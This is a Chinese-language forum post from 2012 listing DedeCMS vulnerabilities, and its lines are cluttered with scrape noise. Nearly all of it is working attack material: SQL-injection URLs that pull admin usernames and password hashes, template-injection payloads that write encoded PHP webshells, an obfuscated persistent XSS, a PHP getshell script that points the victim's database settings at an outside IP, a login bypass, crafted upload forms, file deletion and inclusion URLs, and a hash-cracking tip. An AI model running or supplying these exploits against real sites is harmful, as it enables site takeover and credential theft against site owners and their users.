找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3030|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
( f# W7 I! I, D, O/ A! j& l
Dedecms 5.6 rss注入漏洞* D* F* a0 U% t
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1; y9 ^4 N) j3 |

. a* l1 r3 r! T, s$ l% f" e
. d4 h$ Z: O/ Y! c" G2 _" `
; D8 B" t; j5 U0 M% ?! \% y, r' ~& D+ a, ^' s# p
* p9 D. Y6 C6 Q" G$ P
. j! Q  |" m, g9 b

6 N+ H& M' b, h1 ]
$ Y3 z5 L: K7 A9 YDedeCms v5.6 嵌入恶意代码执行漏洞8 a9 a, C" z3 V) o* `
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}: U3 d. `( }$ D/ R
发表后查看或修改即可执行
. e& n+ i! Q/ ^8 P4 Z' I9 wa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}0 h# R) Y+ b. Y$ x' B
生成x.php 密码xiao,直接生成一句话。6 n' n* V8 k+ M( ~  J

  u* `6 b  X' L0 G" o; l3 k* D) u6 C  Z1 q3 S9 ]6 o
+ N' m" o* d$ Y5 G& K
4 e' i3 ]+ Q* \* S; Q5 T
6 v4 z5 o  u3 S
% i6 j- e. Q& Y$ `& b
5 ~* H2 ^2 d8 x, D* i6 z5 O( Z# f

, X0 C/ a& r8 l: FDede 5.6 GBK SQL注入漏洞: Z# m% V3 l5 a/ v. k' `, [
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
3 n; H9 p0 D& F& a- i
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
4 M  C) V7 x2 }2 R2 t% _0 o. Zhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7% f! c# T6 M/ o. O2 C$ Z

9 N2 s, v4 t) r0 f' Z! [4 t0 `3 t8 u& b1 f
9 u! q+ `) _# A% b6 F  E" u6 V
, e3 {2 Y( n8 r# k! F
! j2 Q+ d# ?2 m9 m+ P( I+ t
, V. W9 Q! t$ d% R1 g- |
; W8 ~# Y2 Y$ l8 U0 x0 p& y7 Y* [( N
7 D( `) g3 {; V, u6 M
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
6 i# X, Z; j. N
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 7 I& W: j5 \* h1 Y# f

% x5 C3 @3 W$ _+ o, |9 m+ w
' q% G  K) i- N
+ H( T. {3 [7 l7 Z" ~# J+ P3 F0 G0 o, `, ?# t' ^6 U4 n
" C, f5 @1 @! _8 c/ i2 w
4 Y  T" f7 |! a! w0 E. l4 F/ [$ |: Z& h
DEDECMS 全版本 gotopage变量XSS漏洞( W8 U& K! Y5 H% B
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 $ o& ~7 _3 [* \& q+ ]$ F. E+ M
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="9 ^2 Z; H- F  i, |

% V# @; {8 H' B: y$ H
2 R9 j, y/ {" r2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 6 s: w9 P0 u! r- ]( u7 x; w
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda% Q, `+ m& b7 O7 b! [5 I, `8 V" ?

/ g3 f& h3 j2 q" ?
+ {2 F3 |# {% `& jhttp://v57.demo.dedecms.com/dede/login.php" O9 N3 K3 ]! U$ Q7 ]& t. T6 t

4 B' A4 ^" |0 t$ s- w% \; \5 ~$ a1 A$ h5 }4 N/ R1 m2 T, l
color=Red]DeDeCMS(织梦)变量覆盖getshell
; R3 l, H/ z  h$ e4 B8 H#!usr/bin/php -w; ?: D; i6 m* ^
<?php0 Z0 I- i1 n$ a
error_reporting(E_ERROR);
) x& E6 `' F# Vset_time_limit(0);" C: I1 m: q: g4 w$ ~; q
print_r(') T) X* b/ e& Z
DEDEcms Variable Coverage
" ^. E; t  J! b/ o0 L. C9 dExploit Author:
www.heixiaozi.comwww.webvul.com
; G3 _$ C. y/ x1 W) q);2 m7 m# ~9 m4 m
echo "\r\n";% i8 V# x9 ]3 \1 \( z) y
if($argv[2]==null){
$ S. ^4 ]! D7 I/ O& r3 i: D4 q8 p2 Uprint_r('
( G" Z' d2 n6 T) h# T+---------------------------------------------------------------------------+) z# g' y( Y' B1 _! e: h" A* J, o" r
Usage: php '.$argv[0].' url aid path
% X6 S, b# G' y4 d) Eaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
% s$ ^( x1 \- l8 pExample:
; r8 ]7 T5 U; [php '.$argv[0].'
www.site.com 1 old
8 C( a% t. P1 ~+ O, I% [+---------------------------------------------------------------------------+
! f5 Z" B8 P9 E6 H9 F. x');2 ]. l* s  @7 O% R3 P3 n: L3 X- h
exit;
$ [+ L) a( U( @, V- z5 o# \/ [}. ?& x: U! [4 y; K2 Y
$url=$argv[1];
, T2 Y2 h8 b: T; _3 D9 U) B" _  K) }$aid=$argv[2];
- C2 b' b( y) O  l. ]$path=$argv[3];
; X8 }7 L( E" c) _9 J/ @2 a$exp=Getshell($url,$aid,$path);4 e* g/ ?$ g! k& s
if (strpos($exp,"OK")>12){: Z: k# z3 W  }. |* U1 E
echo "1 n( V3 V0 r. A+ G% J  G. W9 D
Exploit Success \n";) A5 n0 O' T1 Z# j( W) w
if($aid==1)echo "# \2 m- c/ o2 C* X  B2 a* {
Shell:".$url."/$path/data/cache/fuck.php\n" ;
8 W7 i. `1 ^( t# N# S4 A, Z: F* y& N: K

9 ^6 z* A1 r/ p( k1 R5 Wif($aid==2)echo "
  @; v; ]3 f+ E7 Y" ^3 r/ }8 X, E) YShell:".$url."/$path/fuck.php\n" ;
* ?2 ]5 e( i' E% z  E3 l( o7 u. d: n7 d8 J  {8 `, _- t

+ M3 {, d. D& f- [/ cif($aid==3)echo "3 l& r! ~6 j6 w! a- Y
Shell:".$url."/$path/plus/fuck.php\n";. K( d* }! ]$ h# g% X

/ g1 C7 f; B- D3 U9 @" t
+ R# K, q& p7 `* N! H( D/ p}else{
9 z3 O5 Q+ i- D/ wecho "
0 R% E# z+ R. ]' K! d) S2 mExploit Failed \n";
7 }3 c4 J3 W* M5 b, j: ]% }: [. V}5 X8 |! d6 c# U9 q( _
function Getshell($url,$aid,$path){
5 T8 }' V* X: i3 f( o8 J$id=$aid;# g4 H6 X* G! R6 Q
$host=$url;; Q. E/ {$ @6 h: d$ O/ @
$port="80";/ R1 H9 D( w0 G6 t: ~% }
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$ v  ~3 V' {$ x$ _3 P$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
4 F% j& _2 x+ l9 {2 L/ \+ k$data .= "Host: ".$host."\r\n";
% E! [% d! P3 h: g0 F- d$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
% K% x! ?- \9 x$ z: ?$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";& T( M* Z! O9 f4 f
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";8 Q3 |3 ^) i+ K" t; I; [0 Z  U
//$data .= "Accept-Encoding: gzip,deflate\r\n";- x  \8 g) [9 V7 G/ P. @
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";6 S& D( c, I3 W4 s% M7 c0 m
$data .= "Connection: keep-alive\r\n";
  q2 m3 Y$ a2 U: r6 o5 a% m$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
3 @, t9 v- p* l0 Q$data .= "Content-Length: ".strlen($content)."\r\n\r\n";2 T: Z2 M4 w2 q
$data .= $content."\r\n";& X! Z6 s9 r# H' F
$ock=fsockopen($host,$port);0 B5 H0 z! k5 T; h1 c. Y/ G: s4 y8 o
if (!$ock) {0 F! n+ j& g  m6 u5 k# C: ]
echo "/ c0 N8 `% W: T9 [3 ], W
No response from ".$host."\n";& B& \" }5 V9 G
}2 p8 a2 s0 e( G! Z. o
fwrite($ock,$data);
3 z! v9 A; ?) f' I- l0 d1 Zwhile (!feof($ock)) {+ u/ F7 g1 s/ A" x* s+ u0 ~
$exp=fgets($ock, 1024);
% b* j/ K. q: t; ]& Sreturn $exp;
' l3 D. L) m: O6 @- c6 |) c8 h) O}
" G2 A. l5 c0 {}
6 M% E% X  o' Y9 I: X
3 E- @: ~0 s3 d- |. B- p8 z. w. c* P; u  r' u% l2 p, h* f/ n
?>
9 I; G& T$ p3 V9 k  T: _0 j( m; _- I9 q. r- l
: ^% k) k2 ]% }. c. \  ?% ?( T/ E
$ x" G* _. q/ z2 X! e6 \1 P

  y$ V$ ?- Z% ?/ l) J4 J0 M: i! L4 S4 T$ X- ~

- ~/ \, w' L3 _/ q5 n8 X) ], }# b/ o* [4 y; B: n5 k
, Y2 q3 m( ~) O. |2 q

& C) h- v, J# u  _5 |1 k) F6 C
' ]3 Q7 A: U' x: U! V1 }DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)2 a) V  O) o0 x+ ?2 p
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root/ T7 i  K. J/ w& R% ^0 `/ a0 j3 Z

6 K2 c6 ~( e- R, A. i
( C2 E$ M1 L& A6 _把上面validate=dcug改为当前的验证码,即可直接进入网站后台8 ^( N+ ^) ^; J5 e* j; c
3 d( x( S+ |0 D# w) R
( e$ u( u" [' t5 u, q) h2 Y
此漏洞的前提是必须得到后台路径才能实现  O+ l/ k+ D; H- ~

) U0 u+ g9 x$ W9 p0 G- p/ Y7 D
: C% V- d- [+ T1 p* ~6 I- y* s8 z! ~& d
8 U: Y3 h# y1 t) u0 Y9 E4 |+ g
& S2 c  I/ S9 u+ W$ A% S, ?: ~  O6 y
/ a# {2 \+ a3 t6 M; o: ~% I

# ~' n% e; f0 F% q+ |8 ~1 v9 M& f( |
* P& i; o' H( x" Z$ V8 l

/ I* O7 B1 [/ e4 G& X* Q: J4 H/ ^Dedecms织梦 标签远程文件写入漏洞
/ A  D* Q0 `7 Y前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
; j# a, m( T" n6 S% {  P  y. _3 c+ g7 a' B$ @- L

: t- U; F1 A0 i  ]再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
: h7 O& k0 a2 O+ {<form action="" method="post" name="QuickSearch" id="QuickSearch">7 {2 E$ S6 a1 \  t3 H2 \7 u
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
; Q" h2 q$ x/ l* [6 X7 X# a<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
2 N  i% c# _9 W4 T% \( f<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
9 c' k- i2 j& U" b<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
9 B& l; o1 H; X: X# J6 p<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
2 I* k6 [1 N& X<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />/ c4 D( F  E. S: |5 d
<input type="text" value="true" name="nocache" style="width:400">
; x4 }; q- S2 _! w<input type="submit" value="提交" name="QuickSearchBtn"><br />
0 ~7 u  l" [6 g  M- P</form>1 x. m! _, F9 ?* m! f
<script>& ?! g* _/ }& h
function addaction()7 Z) U( B4 ]! I% h9 W
{
/ }* }# T9 g" S  o# V* Ydocument.QuickSearch.action=document.QuickSearch.doaction.value;
% Y3 `& D- T" i}
" E: i% p: F3 z: o' _</script>
- u- ~' o6 T6 U
% s5 G& ~  I3 M- `3 s) Q, a# V
( s) k) a+ u$ S( [+ h' `) H6 q# P  l

, y% F3 S& ]8 X- [0 S, X5 q5 |& j3 }3 ~0 z" r

+ S1 v2 b; _; b/ }; c; [, g
/ B+ m6 r5 u) c' f3 v9 E8 X6 A5 i5 D" F5 D# x$ u

9 x6 Z" o5 b7 ^- m, u7 j; r* ]  }$ T8 x: Z% {
DedeCms v5.6 嵌入恶意代码执行漏洞- D, M: @& r5 Y& ]) d7 ?  Z. o5 u
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
% T8 A* U" S3 r  D5 K! ka{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}4 l8 {& C0 _) q; t. K
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得9 U1 N! E) B  J' o) |8 G
Dedecms <= V5.6 Final模板执行漏洞3 M; a  V4 ?; m3 k4 n
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:1 O' ^6 o# _0 u6 H, e% f  {
uploads/userup/2/12OMX04-15A.jpg! |! `: p$ u' j9 C9 r

0 V7 V1 s2 {2 C+ L9 J9 w' p( X# s& M6 Q& ?
模板内容是(如果限制图片格式,加gif89a):/ K/ j, w& w7 X; Y# ~! W6 d
{dede:name runphp='yes'}
% `# t- B3 F1 j! [2 W% {# D) y. v$fp = @fopen("1.php", 'a');
. r7 r" S, S( M* K- A+ U% \0 U@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
$ u- V6 Y5 _9 z6 p3 K* x& D, q@fclose($fp);
4 e5 v7 M8 H. i0 s+ L. C{/dede:name}
7 z* I2 |/ W" G2 修改刚刚发表的文章,查看源文件,构造一个表单:
, w- r+ D) n4 c8 d9 H) Y<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
4 }3 I/ @, U4 N5 y# i; e- ]<input type="hidden" name="dopost" value="save" />2 ?  P  K( Z7 @
<input type="hidden" name="aid" value="2" />0 Q; O$ b2 E/ G5 i; o
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />* ?6 V: N5 G$ [1 m0 s5 X
<input type="hidden" name="channelid" value="1" />; `( V9 O9 m% q( O$ h
<input type="hidden" name="oldlitpic" value="" />
6 `/ R- U  v' S3 I<input type="hidden" name="sortrank" value="1275972263" />/ [% K- d' @& n7 u) ~  C9 E6 ^
, ^9 g* a  e2 o  Z
2 |7 o3 y8 h% ~1 T- k
<div id="mainCp">/ x+ o# @1 e6 n' z  l, F
<h3 class="meTitle"><strong>修改文章</strong></h3>$ Y) ?% r6 \) i1 ^

# y; O/ A; F3 X& Q
! g: P6 v% Z' m  V<div class="postForm">
1 k  Y2 H$ ?$ }  A+ \( O! F<label>标题:</label>, b, u1 x+ i1 x& x
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>  ~* c  g; B2 y& g! A0 k3 ?8 K
5 b4 Z6 }# K+ ?! R- E: ?, x6 a
$ D4 o2 S- ~2 p. d5 m( {5 f8 H# J
<label>标签TAG:</label>3 L/ g3 i# L( |5 ?
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)! @2 ]$ M. v$ ^: P% \3 {& U; h

6 O- \, U9 r" v! v* J
0 i/ C; u1 a- s* W, w<label>作者:</label>7 |( |; _2 x7 H6 l" m, j- t
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
4 M. G  x% }+ k$ x( i! g
: t+ i( c0 j9 x0 s% S# b7 h  G, @  H$ r0 F' b4 b$ _! i
<label>隶属栏目:</label>
$ I! Q( ]+ Y6 P+ r8 i<select name='typeid' size='1'>
5 M9 {& F  _4 D1 {9 g<option value='1' class='option3' selected=''>测试栏目</option>
: F9 E5 ]) n, x</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
1 E$ Y) A5 ^/ W$ L3 l0 e# K
7 `( I# y* x; d6 X3 o! K7 [8 b  ]4 N# P7 @' n
<label>我的分类:</label>7 J) A+ _2 ]$ H5 r& U
<select name='mtypesid' size='1'>
# R6 h( M1 [6 }' h<option value='0' selected>请选择分类...</option>1 q5 B7 c0 r) A) q/ d* u
<option value='1' class='option3' selected>hahahha</option>: H6 p# v! F7 Q2 P2 y+ z& }) ]
</select>
$ x3 m/ o. E/ I' j1 I
' e% b0 W- w* B; I/ c/ [3 Q1 ~1 p9 J1 C! D! E
<label>信息摘要:</label>
2 R4 g! K+ G+ _- s- f; j' i<textarea name="description" id="description">1111111</textarea>& k; F& X" H2 I
(内容的简要说明)3 |# B. e! N, a" C5 Z- w/ @

  x4 ?1 t) M1 _. B* B) [3 o, o: r, O. f
<label>缩略图:</label>
6 j  c  u2 K6 I8 n% ~) O8 k<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>; f' H( `5 i7 Y: z$ a5 h
) P# V6 I; d9 G; J4 H4 t% j' A
1 s2 `/ s4 _  v( ], K2 {
<input type='text' name='templet'
2 V% m0 N; L8 Cvalue="../ uploads/userup/2/12OMX04-15A.jpg"># f# d# v0 @- w, I
<input type='text' name='dede_addonfields'  {4 `/ K/ x5 s% o% j
value="templet,htmltext;">(这里构造)2 ?( I2 k3 k1 ]9 U/ m
</div>1 Z( h/ L  \; I

  x1 \4 `( W& _) ?: }; f, v+ E; w  h* F
<!-- 表单操作区域 -->: _. D3 O8 _# H8 ?- m" U5 j- D& w
<h3 class="meTitle">详细内容</h3>7 |8 A4 O3 u) j+ ?9 S

2 E; ]% n2 `4 U' ]" c8 K3 x2 r
<div class="contentShow postForm">
+ ^7 h2 [/ a# i8 ]' ]<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
( ~$ s3 x/ l3 C" u' l% ~$ S9 M! H' O! r$ A
" G  r9 |7 S+ O3 p. `1 I4 A) t# H1 R
<label>验证码:</label>( p7 c% W1 i  i, ?% ^+ ~" M
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
; R  r4 ?" N* k2 }. R8 O8 V<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
& F: t8 l* I+ K6 s. ^6 y, x' a3 r+ x9 L, |! L3 a
- }0 I3 P; @' ]/ O' A8 H" `* [
<button class="button2" type="submit">提交</button>, M9 v5 `3 [* @) B$ p+ w. B
<button class="button2 ml10" type="reset">重置</button>
, V; X0 H/ }) L. v# ^</div>
6 w+ P* L4 }7 U" i; ?- g- F/ k& t. l5 p# z

4 I- X, Z# a9 X- S% M( H; ?$ j</div>0 _1 F) A& @% d. b: i
0 p5 H! T7 I$ L6 X( x
- j. V9 U# R+ k( E
</form>. a: m/ N7 O7 c9 Y% s

6 N/ O+ ?9 {& {  t& }5 x( k
- f0 G- M9 e1 V1 n提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
" _" u; M4 ~0 f4 U' d$ \1 k2 t假设刚刚修改的文章的aid为2,则我们只需要访问:% I, R: {' \% Z2 K
http://127.0.0.1/dede/plus/view.php?aid=2
! a! R5 W7 r' Z; b# b即可以在plus目录下生成webshell:1.php! j- H" @. o! p! ]& G4 N( W
1 d8 g  L- Y& F+ @

& S& f! S6 W! L' [
# D$ z6 {7 z; Q, x
0 [0 C2 B" i! a6 f1 j/ K4 _# E! d  c2 M5 d; [
& ]$ Q: l. {& S6 r: K

* @# \, Z0 r4 i+ }" Z/ r9 k( A- x3 M6 {$ n9 Y* ]  a; x

4 g6 H& @# p- o/ a. `& B" \$ I" e' M# D. e  t
8 j/ R( E" P2 P- F5 ~+ }
% W2 I6 R" P$ T% l
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6), Y6 q; [( E5 p8 ~. ]6 Y% V
Gif89a{dede:field name='toby57' runphp='yes'}4 Y- g" Y$ M# \; s/ r; f
phpinfo();" V8 G' c& A6 W
{/dede:field}0 x0 M2 K$ L3 I% [  I3 L! y$ D8 c
保存为1.gif0 a' z" \+ l' E; z
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
9 `: v+ R# r7 U<input type="hidden" name="aid" value="7" />
% o* M0 a- G- B+ B9 I& t* O, K9 ?: O<input type="hidden" name="mediatype" value="1" />
# Z8 ]3 _& ^4 ]5 _% V( g0 K3 d<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
  _% R: X5 I4 `" a, f. [' F1 C* `<input type="hidden" name="dopost" value="save" />
) Q& ?) S1 X  e/ r4 O6 I, K9 {; C: @<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
$ q4 z4 B2 D7 P/ n0 R<input name="addonfile" type="file" id="addonfile"/> * i. U6 C  q; b
<button class="button2" type="submit" >更改</button> " `" g, ?2 R8 f
</form>
) R  O2 A# }$ z6 v  `; w1 _6 P1 O; k# j# p# A+ @( q5 C

/ H* s# q  ]4 R构造如上表单,上传后图片保存为/uploads/userup/3/1.gif7 Z! M0 S" ?$ V% h0 s
发表文章,然后构造修改表单如下:: r5 U1 G: E. {+ a/ `# a5 b

7 }" c( n5 @, J) B7 C8 v0 X' @8 Y$ Y+ _
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
% s- f- }# j; Z1 E<input type="hidden" name="dopost" value="save" />
( L1 G1 x3 h0 G5 x, j$ ?<input type="hidden" name="aid" value="2" />
/ H7 m- Q! W  P$ h. j3 M<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
' r# B5 O# N9 N<input type="hidden" name="channelid" value="1" /> 4 b* y7 z* ?% g/ [7 `( c1 H
<input type="hidden" name="oldlitpic" value="" />
# C1 ^4 b. F8 U8 y  o<input type="hidden" name="sortrank" value="1282049150" />
$ M" [+ T7 s' M) z$ q* y2 J<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> + A9 o2 {* t" v  a, w
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
1 I8 H1 D2 B' q& B' ~( `, U5 ]<select name='typeid' size='1'> 9 L1 A/ {3 Y8 W9 P$ |# h! k+ p0 `( ~
<option value='1' class='option3' selected=''>Test</option>
3 c% Q; ~. n% K8 e$ e$ G<select name='mtypesid' size='1'>
% Z) P/ ~! _  I: N. i<option value='0' selected>请选择分类...</option> / c9 ~7 B% x1 y$ A8 C
<option value='1' class='option3' selected>aa</option></select> $ W# C8 |- m' G7 W
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> * `" P( H# O8 T9 X4 g( |/ `
<input type='hidden' name='dede_addonfields' value="templet"> ! G/ y5 [0 z6 U$ _. f/ J( v
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
# o5 P: e2 Z$ Q! S! ]: |<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 8 j2 x2 ?7 v+ U& I/ I- U6 E
<button class="button2" type="submit">提交</button>
# x! j9 ]7 \4 l</form>
/ p! e9 y1 f  e6 [" T6 Z0 C( i- a: ^. z- h; F" T

8 Y! ^5 ^6 l7 H  |
. U* u4 ?7 L+ Q' C4 r; n/ ~* e' }# @4 z, i  H& D% r. |0 B9 Y1 Z
' o0 o+ t  }& J: q* o: R, f7 ~

# d2 h) G. T) |6 }% i" q& i& e  U0 O" {+ P, R

3 `8 K- S8 e1 r4 S" z% w* M
9 M' S+ m+ A! f( o1 G
: d6 [# Y3 g5 q& b: l8 a6 ^) I  E0 h! X/ j: q7 F

$ I/ T$ W2 N- U6 b6 n% K: B织梦(Dedecms)V5.6 远程文件删除漏洞
, N  z% @9 F% ~6 I, @
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
/ l! M( k1 j( K( @+ p# S
2 }2 y$ D, P2 h
$ `( E6 s0 V( X6 d$ P
- X2 h) w4 e# V$ w* g
' X. j/ F2 x5 l* w3 W8 b: ?  ]: j$ u

& Y' D' t0 n3 B( I; L5 k, w% v$ ?4 G& ^; ^$ l( b* d/ |$ f
2 B! K. `0 i% p' f$ ]2 n* N  z

" d- G/ ]9 U. q& e1 j% m! `# F. l' ~( p+ d& y' t
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 5 y8 I- @- C9 I
http://www.test.com/plus/carbuya ... urn&code=../../
6 O$ D3 A1 Y0 ^# h
& J, o: [8 G1 M% D) m% {2 Z* p& a& N
' I6 w. H% q5 v! b
. u$ P! i/ _6 e( F
2 |- ^$ e/ K" U) P/ ]
3 j2 E% G1 M# Y7 @" b. i, [+ @% |# G0 t
7 y+ ^+ }1 d2 j$ f8 X7 E( A
- I9 [+ i6 f- c7 d4 A3 L

* S6 i( n" p$ u5 T7 j) |$ e0 O- u3 u) O0 Z- p8 X3 [7 V! ~
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 9 l4 x, Y5 r4 e$ ]
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
1 J& @" i1 o0 |* c' j- Q密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
, y5 l9 s/ V, k" U8 h- x8 N1 e- C  U" c# J, G  c3 X

! r# n* Q  V1 W9 V9 T6 W! g: E1 j5 `, u. s8 k; I
  g$ U( z, ^. h$ H8 k
* Y# ~4 X* c3 |, @( c5 F- W6 V
/ R7 n" P, O# d# k- [& V  U% O

8 p9 {7 f6 f; R& w
& u1 S( Y/ q$ @
3 |* f% p$ u" z5 j: }% G' G. g8 p4 W8 {" q* S" [
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
% `4 j4 X! r' U- C" D; ]& P: G2 f4 Y: [http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
2 N; f' A( ~' B" M" N
- @' v7 Y. M! a' k9 T6 a% h* ]
& H( ^. `/ D8 i  u6 _
